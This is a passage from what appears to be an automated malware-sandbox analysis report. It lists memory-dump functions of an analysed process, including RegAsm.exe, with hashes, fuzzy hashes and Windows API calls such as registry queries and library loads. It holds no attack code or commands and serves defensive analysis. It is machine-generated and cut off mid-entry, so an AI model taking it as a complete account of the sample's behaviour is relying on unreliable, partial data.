                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 62e99fec7fc7b3badb76ed6fac95d876cbcbbc8c6ba798f6f8a58cf9ec5f1353
                                                                            • Instruction ID: bb7f7630ff1dfa8b2cb30510f8fa5f927e770b151beab50ab267367b779875dd
                                                                            • Opcode Fuzzy Hash: 62e99fec7fc7b3badb76ed6fac95d876cbcbbc8c6ba798f6f8a58cf9ec5f1353
                                                                            • Instruction Fuzzy Hash: 65D0C9F2D0622CFB9B00EFF4D90289FB7B9DB05500B1146EA99099B210FE365F1067D2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0733CAD0, Relevance: .0, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.319106918.0000000007330000.00000040.00000001.sdmp, Offset: 07330000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dbcef5c395f5c673d87ed76c55c2f1c93d814102d17bdb09fc090918b690f88a
                                                                            • Instruction ID: 58c7e918dc9fc6e739d0296992eb27fcb8a7bf4254ad48f247067e0340e6a738
                                                                            • Opcode Fuzzy Hash: dbcef5c395f5c673d87ed76c55c2f1c93d814102d17bdb09fc090918b690f88a
                                                                            • Instruction Fuzzy Hash: A6C012313402095BD304CA88C842A22B3AADBC8614B14C079A808C7746DE36EC028694
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0733D4F0, Relevance: .0, Instructions: 11COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.319106918.0000000007330000.00000040.00000001.sdmp, Offset: 07330000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                            • Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
                                                                            • Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                            • Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 006A29C0, Relevance: .8, Instructions: 781COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.304839621.00000000006A2000.00000002.00020000.sdmp, Offset: 006A0000, based on PE: true
                                                                            • Associated: 00000000.00000002.304825102.00000000006A0000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.304885986.000000000072E000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 808fd7effe782b89d215cf12035b8f47c24dc8114fe9693304e57852be07821d
                                                                            • Instruction ID: 250ccae9164393af053a923e1686ea099967037ad1e8485f08fef25c5a590454
                                                                            • Opcode Fuzzy Hash: 808fd7effe782b89d215cf12035b8f47c24dc8114fe9693304e57852be07821d
                                                                            • Instruction Fuzzy Hash: 7D52F25154F7C25FC7139B785CB52D2BFB2AE6322871E49CBC4C08F4A3D109599AEB22
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00E5E5D0, Relevance: .3, Instructions: 315COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fd9f548338e432473028d5556b6549aff99dc0b7989402ebf47de8bf2d4821e8
                                                                            • Instruction ID: 2c3b15f3c344742d7afc3f69871ad8d56dedc7022d21eb9a1252669dc57fe53c
                                                                            • Opcode Fuzzy Hash: fd9f548338e432473028d5556b6549aff99dc0b7989402ebf47de8bf2d4821e8
                                                                            • Instruction Fuzzy Hash: 481206F1C99746CBDB10CF65E9982A93BA0B74432CFD24A08D2612FAD1D7B8156ECF44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00E5C204, Relevance: .3, Instructions: 265COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1837992a558c7a6c2abe9ad5be049bd79d6927a85215a2b96df973c1c7a13a5d
                                                                            • Instruction ID: 959a6f1953ae4f97396e8ef4726bde91587c1cf0835c79937a806b6062da3391
                                                                            • Opcode Fuzzy Hash: 1837992a558c7a6c2abe9ad5be049bd79d6927a85215a2b96df973c1c7a13a5d
                                                                            • Instruction Fuzzy Hash: 78A19E36E0060ACFCF15DFA5C8445DEB7F2FF85305B25896AE905BB261DB31A919CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00E5E5C0, Relevance: .2, Instructions: 220COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.305239269.0000000000E50000.00000040.00000001.sdmp, Offset: 00E50000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 04391ea995c73dcdda1842c26861eef103f60e573b8f3d14d5655b00c8d4a444
                                                                            • Instruction ID: cb49f1cabdb23e98cf08b3cf23b0283e7a93510fdee6238c926456a6d0a441b2
                                                                            • Opcode Fuzzy Hash: 04391ea995c73dcdda1842c26861eef103f60e573b8f3d14d5655b00c8d4a444
                                                                            • Instruction Fuzzy Hash: 96C129F1C99746CBDB10CF65E8982A97B71BB8432CFD24A08D2616F6D0D7B8146ACF44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Analysis Process: RegAsm.exe PID: 2308 Parent PID: 4608 RegAsm.exeCOMMON

                                                                            Executed Functions

                                                                            Function 06CC02F0, Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.489974657.0000000006CC0000.00000040.00000001.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d483a8208a7e5265de542f2ef48e696df9a16b1d51598a02c5fe6430e1c05d00
                                                                            • Instruction ID: 8bbe8e62aefe20a744d9c20fa6532ac6b976e2033a3981bf02c7443b221f6d88
                                                                            • Opcode Fuzzy Hash: d483a8208a7e5265de542f2ef48e696df9a16b1d51598a02c5fe6430e1c05d00
                                                                            • Instruction Fuzzy Hash: 73413871D05219DFCB40CFA9D980ADEFBF9AF88310F15816AE918E7241E7359A05CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 029BB6C0, Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 029BB730
                                                                            • GetCurrentThread.KERNEL32 ref: 029BB76D
                                                                            • GetCurrentProcess.KERNEL32 ref: 029BB7AA
                                                                            • GetCurrentThreadId.KERNEL32 ref: 029BB803
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.480239496.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0
                                                                            • Opcode ID: 28b57da8509fe6a14e47bc21ceffd72f7330e34aa94b6cfa91183847ed0beb7b
                                                                            • Instruction ID: f00e5c7357a1d9ede9f0cb1fd228cfe1b154d1a1e2c03c608d1a0fcfdc5b003e
                                                                            • Opcode Fuzzy Hash: 28b57da8509fe6a14e47bc21ceffd72f7330e34aa94b6cfa91183847ed0beb7b
                                                                            • Instruction Fuzzy Hash: 075187B0E053498FDB10CFAAC688BDEBBF1AF48318F208459E419A7790D7349845CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 029BB6D0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 029BB730
                                                                            • GetCurrentThread.KERNEL32 ref: 029BB76D
                                                                            • GetCurrentProcess.KERNEL32 ref: 029BB7AA
                                                                            • GetCurrentThreadId.KERNEL32 ref: 029BB803
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.480239496.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0
                                                                            • Opcode ID: 2beccc28452c23e703cc8cf58d09bdd3fc90a8c7d28eea52b9858fea43120078
                                                                            • Instruction ID: b19272208759cbcce8ee661c54240a70d8262f632af302b88aa92e4dde201335
                                                                            • Opcode Fuzzy Hash: 2beccc28452c23e703cc8cf58d09bdd3fc90a8c7d28eea52b9858fea43120078
                                                                            • Instruction Fuzzy Hash: 315156B0E017498FDB10CFAAC688BEEBBF1AF48318F208459E419A7790D7749845CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 029B93E8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 029B962E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.480239496.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID: HR$HR
                                                                            • API String ID: 4139908857-4037001784
                                                                            • Opcode ID: 7f69e67774c485b8423c78298bc98e69fe9f4878e75db02c8e220784beec290d
                                                                            • Instruction ID: 3266c308585cc98f0f017279747364e6b6eb5212fd40ded23a5412f001795072
                                                                            • Opcode Fuzzy Hash: 7f69e67774c485b8423c78298bc98e69fe9f4878e75db02c8e220784beec290d
                                                                            • Instruction Fuzzy Hash: 46713570A10B058FD725DF2AC14179ABBF6BF88308F008A2DD58AD7A50D774E845CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 029BFAA0, Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 029BFD0A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.480239496.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: 71d994c5c56c154abf1368748a1cde5668ef3aa36ccba23da2fe1ac5e66786b1
                                                                            • Instruction ID: aafc21305910c042e54164631932b3724d4c6c90e6cb8deb6e818b3df141851d
                                                                            • Opcode Fuzzy Hash: 71d994c5c56c154abf1368748a1cde5668ef3aa36ccba23da2fe1ac5e66786b1
                                                                            • Instruction Fuzzy Hash: 60917F71C093889FCB02CFA5C991ADDBFB1FF4A314F19819AE844AB262C3749845CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06CC0385, Relevance: 1.7, APIs: 1, Instructions: 226timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemTimes.KERNEL32(00000006,00000006,?), ref: 06CC06C4
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.489974657.0000000006CC0000.00000040.00000001.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: SystemTimes
                                                                            • String ID:
                                                                            • API String ID: 375623090-0
                                                                            • Opcode ID: a5f0584b1850e3cabaf5fe36afe8df54fe1fbe2e20cd070ca2cc2518c7a377ed
                                                                            • Instruction ID: c5764096ca11f6db574cefa97eacb0941757584fd7d9b074cf59fb59721192ca
                                                                            • Opcode Fuzzy Hash: a5f0584b1850e3cabaf5fe36afe8df54fe1fbe2e20cd070ca2cc2518c7a377ed
                                                                            • Instruction Fuzzy Hash: 03B1BF75D0061ACFDB51DF69C880AC9FBB5BF48310F15C69AD958AB301E770AA85CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05091A4C, Relevance: 1.7, APIs: 1, Instructions: 185registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegQueryValueExA.KERNEL32(00000000,05095F31,00020119,00000000,00000000,?), ref: 050962FF
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.487462241.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID:
                                                                            • API String ID: 3660427363-0
                                                                            • Opcode ID: 8fca35b745907afb1c75e9d56ab2848a57412bacb108cc79e4fb0186125c33a1
                                                                            • Instruction ID: e682f0518529133fba47611e20e322e1caa9e8e9d8012aecd0d4c38226f42e9d
                                                                            • Opcode Fuzzy Hash: 8fca35b745907afb1c75e9d56ab2848a57412bacb108cc79e4fb0186125c33a1
                                                                            • Instruction Fuzzy Hash: E9715770E046089FDF18CFA9D884BEEBBF1BF48314F148029E815AB395DB769845DB81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05096136, Relevance: 1.7, APIs: 1, Instructions: 182registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegQueryValueExA.KERNEL32(00000000,05095F31,00020119,00000000,00000000,?), ref: 050962FF
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.487462241.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID:
                                                                            • API String ID: 3660427363-0
                                                                            • Opcode ID: 37babc06ddff24c162a996808dbe670e2cf0fce164c650b781c10ea7b4852442
                                                                            • Instruction ID: 2349d3cffab43ac42433cd4d9c0968d5a178c21c2d947eea627dcf6dd515bf80
                                                                            • Opcode Fuzzy Hash: 37babc06ddff24c162a996808dbe670e2cf0fce164c650b781c10ea7b4852442
                                                                            • Instruction Fuzzy Hash: 8D715770D046089FDF18CFA9D884BEEBBF1BF48314F148029E815A7394DB759885DB81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 029BFBF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 029BFD0A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.480239496.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: 63adbf440255ae9597a3103df1998708ee77e3485c1bee581f8834a637f54e57
                                                                            • Instruction ID: b4f7a6a754e1795a83acd6c80221fecbe2537161863790ee895512e178bec580
                                                                            • Opcode Fuzzy Hash: 63adbf440255ae9597a3103df1998708ee77e3485c1bee581f8834a637f54e57
                                                                            • Instruction Fuzzy Hash: 4D41C0B1D003099FDB15CF9AC984ADEFBF5BF88314F24812AE819AB210D7759945CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05091A40, Relevance: 1.6, APIs: 1, Instructions: 100registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNEL32(80000002,?,00000000,?,?), ref: 050960AF
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.487462241.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: 0a335f216431dbbedd72ef60fa7116eea90c5522232d709c3be5c60b6a670d22
                                                                            • Instruction ID: 5601e1b2555bbc0ef966d0f40b6e83fef31b93eac6b4cba235979cebb0227193
                                                                            • Opcode Fuzzy Hash: 0a335f216431dbbedd72ef60fa7116eea90c5522232d709c3be5c60b6a670d22
                                                                            • Instruction Fuzzy Hash: 844153B0D002189FCF14CFA9D885B9EBBF1BF88310F14812AE859AB354DB769845DB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05095FBC, Relevance: 1.6, APIs: 1, Instructions: 99registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNEL32(80000002,?,00000000,?,?), ref: 050960AF
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.487462241.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: 06bc1472e0c85c40853eb7de759f0ad19882a1ab7fc2642342e08dda2c08885c
                                                                            • Instruction ID: cfb94cf31d6786afae15a15045958bd557d207e343559d060d11ba6ca57f7472
                                                                            • Opcode Fuzzy Hash: 06bc1472e0c85c40853eb7de759f0ad19882a1ab7fc2642342e08dda2c08885c
                                                                            • Instruction Fuzzy Hash: 284175B0D003189FCF14CFA9E88579EBBF1BF88310F14852AE858AB344DB768845DB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06CC6444, Relevance: 1.6, APIs: 1, Instructions: 90libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.489974657.0000000006CC0000.00000040.00000001.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: fe1e1564bdc0a51e860f14a512fa6c0bdff9530e75422244796b92fc6edae4b5
                                                                            • Instruction ID: cb3bf780e0415d70d14ff1e3d7986de6b08c0949df9e635d7b102e6289d4342e
                                                                            • Opcode Fuzzy Hash: fe1e1564bdc0a51e860f14a512fa6c0bdff9530e75422244796b92fc6edae4b5
                                                                            • Instruction Fuzzy Hash: 663144B0D102499FDB54CFAADA8579EFBF1AF08724F20812DE815A7380D7799485CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 029BBDC1, Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 029BBD87
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.480239496.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: f85ec17e3dcb82c74eebab88339dbbcb67bde8d9e03c15948f74a5b92d45b6ff
                                                                            • Instruction ID: dc8e3fdaa5d0bc44d159bf1f9c230038d682bd902874096fed4ac39cf2871738
                                                                            • Opcode Fuzzy Hash: f85ec17e3dcb82c74eebab88339dbbcb67bde8d9e03c15948f74a5b92d45b6ff
                                                                            • Instruction Fuzzy Hash: 7141B074E80380CFE7119F78E5587B97BB9EB88354F004A29E9054BB86DB741825CF20
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06CC3AB4, Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.489974657.0000000006CC0000.00000040.00000001.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: e7f0957bd7b7bac074df0d823999d9c1ec58872dc4b95d025f123fb3d384aca9
                                                                            • Instruction ID: 127e1dd9e26b83c439bf4a91c162c86b6d915b31a640f1838190896e8ecb73d4
                                                                            • Opcode Fuzzy Hash: e7f0957bd7b7bac074df0d823999d9c1ec58872dc4b95d025f123fb3d384aca9
                                                                            • Instruction Fuzzy Hash: 2E3142B0D102488FDB54CFAACA8579EFBF1AB08724F20812DE815A7380E7789845CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06CC034B, Relevance: 1.6, APIs: 1, Instructions: 81timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemTimes.KERNEL32(00000006,00000006,?), ref: 06CC06C4
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.489974657.0000000006CC0000.00000040.00000001.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: SystemTimes
                                                                            • String ID:
                                                                            • API String ID: 375623090-0
                                                                            • Opcode ID: 469151361699a3ec697ceb3f4a88f24c21216f219057066beb0ae2ed0a7fcd94
                                                                            • Instruction ID: 81530409cbb2e4a2f83cc5a03d8675237c1670dad815c799514f4a062f6e38a3
                                                                            • Opcode Fuzzy Hash: 469151361699a3ec697ceb3f4a88f24c21216f219057066beb0ae2ed0a7fcd94
                                                                            • Instruction Fuzzy Hash: 1F3112B0D05249DFCB40CFA9D580ADEFBF4BF89320F25806AE958EB251D3359945CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 06CC0368, Relevance: 1.6, APIs: 1, Instructions: 81timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemTimes.KERNEL32(00000006,00000006,?), ref: 06CC06C4
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.489974657.0000000006CC0000.00000040.00000001.sdmp, Offset: 06CC0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: SystemTimes
                                                                            • String ID:
                                                                            • API String ID: 375623090-0
                                                                            • Opcode ID: c296636878023e5cf8e7a56b4de5cc13af3bfce2b5d831370483ea85cd6a7c1a
                                                                            • Instruction ID: 0c6debd3ed214d02a04b589cf944d5a78a950f90771b75b24009addcba998f85
                                                                            • Opcode Fuzzy Hash: c296636878023e5cf8e7a56b4de5cc13af3bfce2b5d831370483ea85cd6a7c1a
                                                                            • Instruction Fuzzy Hash: 283112B0D05248CFCB40CFA9C580ADEFBF4BF99310F25816AE808EB241D3359945CBA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 029BBCF9, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 029BBD87
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.480239496.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 54d83992d15f47acdb0f4c470e2d66ca617ef1fe5257160f3553e9d09d1c9593
                                                                            • Instruction ID: f401b8be27ff780670ef0df8d97be4ebe0bd075630a1ab38ca19f41acabcb7a5
                                                                            • Opcode Fuzzy Hash: 54d83992d15f47acdb0f4c470e2d66ca617ef1fe5257160f3553e9d09d1c9593
                                                                            • Instruction Fuzzy Hash: 8D2103B59012489FDB11CFAAD584AEEFFF4EF88314F14801AE858A3350D379A954CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 029BBD00, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 029BBD87
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.480239496.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 8eabce5743544d87e9da92163eb20b985f5e7ab9bc58830dfbdc3b3d5dcf7b01
                                                                            • Instruction ID: 7454eed76f0cf15f25c9234aedf07fae904cf80619920b20ddbedec3b6476788
                                                                            • Opcode Fuzzy Hash: 8eabce5743544d87e9da92163eb20b985f5e7ab9bc58830dfbdc3b3d5dcf7b01
                                                                            • Instruction Fuzzy Hash: 3E21C4B59002099FDB10CF9AD984ADEFBF4EF48314F15841AE958A7350D378A954CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 029B9849, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,029B96A9,00000800,00000000,00000000), ref: 029B98BA
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.480239496.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 61de10b7d58e4d5154ebb74686f91ab76383a24c0fcdcd0c9e83a8c1be346036
                                                                            • Instruction ID: 32762a0b38d837ac2ef16bdba0e4ddbc4822ab51d35cf6fd07db65349bc663b1
                                                                            • Opcode Fuzzy Hash: 61de10b7d58e4d5154ebb74686f91ab76383a24c0fcdcd0c9e83a8c1be346036
                                                                            • Instruction Fuzzy Hash: DA1100B69002099FDB10CF9AC584BDEFBF4AF89314F15842AD929A7200C375A949CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 029B8768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,029B96A9,00000800,00000000,00000000), ref: 029B98BA
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.480239496.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 97a86e235f96950fead37db52e84f74e8e2e8045348e3994d9918ba7d0c9b7cc
                                                                            • Instruction ID: b9a28949b352c18849af5d82087e8150634dbc26645c98dee5260799a7c725d1
                                                                            • Opcode Fuzzy Hash: 97a86e235f96950fead37db52e84f74e8e2e8045348e3994d9918ba7d0c9b7cc
                                                                            • Instruction Fuzzy Hash: C61100B69002099FDB10CF9AC544BDEFBF4EF89314F15842EE919A7600C375A949CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 029B95C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 029B962E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.480239496.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 8c7054b9538b0b836f87961d68434baf552f21f1066c228fbd382f2954cbbed7
                                                                            • Instruction ID: d51edd62a0b720c02e3899438b7140ba29327b42a2d3276cc6421a18f0303810
                                                                            • Opcode Fuzzy Hash: 8c7054b9538b0b836f87961d68434baf552f21f1066c228fbd382f2954cbbed7
                                                                            • Instruction Fuzzy Hash: 3A1110B1D00649CFDB10CFAAC544BDFFBF4AF89224F11841AD829A7200D375A549CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 029BFE38, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowLongW.USER32(?,?,?), ref: 029BFE9D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.480239496.00000000029B0000.00000040.00000001.sdmp, Offset: 029B0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: LongWindow
                                                                            • String ID:
                                                                            • API String ID: 1378638983-0
                                                                            • Opcode ID: 2d0b5c49973e01653a8ad02ee19e736a81861c463d300205a279b0cbea3a57fa
                                                                            • Instruction ID: b6c57f1d96f91ecfd1899d5471309db4bb7e39f4445bfbc1c2374eb2fd867b08
                                                                            • Opcode Fuzzy Hash: 2d0b5c49973e01653a8ad02ee19e736a81861c463d300205a279b0cbea3a57fa
                                                                            • Instruction Fuzzy Hash: D71122B5900209CFDB20CF99C588BDFFBF4EB88324F10844AE858A7601C374A944CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05090438, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.487462241.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                                                            Similarity
                                                                            • API ID: DispatchMessage
                                                                            • String ID:
                                                                            • API String ID: 2061451462-0
                                                                            • Opcode ID: dcab54399b9cdec7f35fbc48794248efdd388d3182e273703574d8fcbbe9aed3
